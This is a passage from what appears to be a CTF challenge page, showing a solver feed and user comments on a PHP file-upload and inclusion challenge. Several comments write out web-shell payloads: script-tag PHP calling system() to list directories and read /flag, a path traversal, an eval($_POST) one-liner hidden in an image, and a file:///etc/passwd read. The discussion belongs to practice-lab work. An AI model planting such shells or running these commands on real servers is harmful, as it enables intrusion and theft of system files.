评分(5)
解题动态
2046185809 攻破了该题 2天前
N3verL4nd 攻破了该题 3天前
sun_space 攻破了该题 3天前
zmzm 攻破了该题 4天前
unigui 攻破了该题 4天前
zlinxx 攻破了该题 4天前
a5580990 攻破了该题 4天前
ldy127bugku 攻破了该题 5天前
zzz666 攻破了该题 5天前
Sadoshi 攻破了该题 6天前
f13yf 攻破了该题 6天前
cyberneko 攻破了该题 8天前
shingu 攻破了该题 8天前
1031368023 攻破了该题 8天前
qiaoooo 攻破了该题 8天前
18846771521 攻破了该题 9天前
smtall 攻破了该题 9天前
3028545694 攻破了该题 9天前
xiaoli98 攻破了该题 10天前
评论
狐萝卜CarroT 3年前
举报
什么意思,直接改成/flag就出来了
zxmals 3年前
举报
我这运气 file:///etc/passwd
wINFerno 3年前
举报
这题目我使用蚁剑连接不上,就写了<script language="php" >system('ls -al /')</script>查看目录 <script language="php" >system('tac /flag')</script>找到flag
zhou0626 3年前
举报
用蚁剑看了眼发现flag文件被放到了根目录
andrewlong 3年前
举报
/flag ??????
守得云开见月明 3年前
举报
@思南you flag是直接存放在根目录下的
思南you 3年前
举报
这是什么原理大佬
王大发财 3年前
举报
一个一个传的<script language=php>system("cat ../../../flag")</script>
onerm 3年前
举报
猜了一下,直接/flag。。。
陈江川0118 3年前
举报
无非就是换了个写一句话木马方式
yes1yi 3年前
举报
有人把flag删掉了?
a2cai 3年前
举报
不是很懂,试过<?php @eval($_POST['shell'])?>放到jpg里,然后上传后包含它,打开F12发现它其实会echo它?但会对一些字符进行转换啥的,我试的<?php和?>会转换成 _ ,然后 < 和 > 分别转换为<!-- 和-->,就不知道为啥用<script language='php'>@eval($_POST[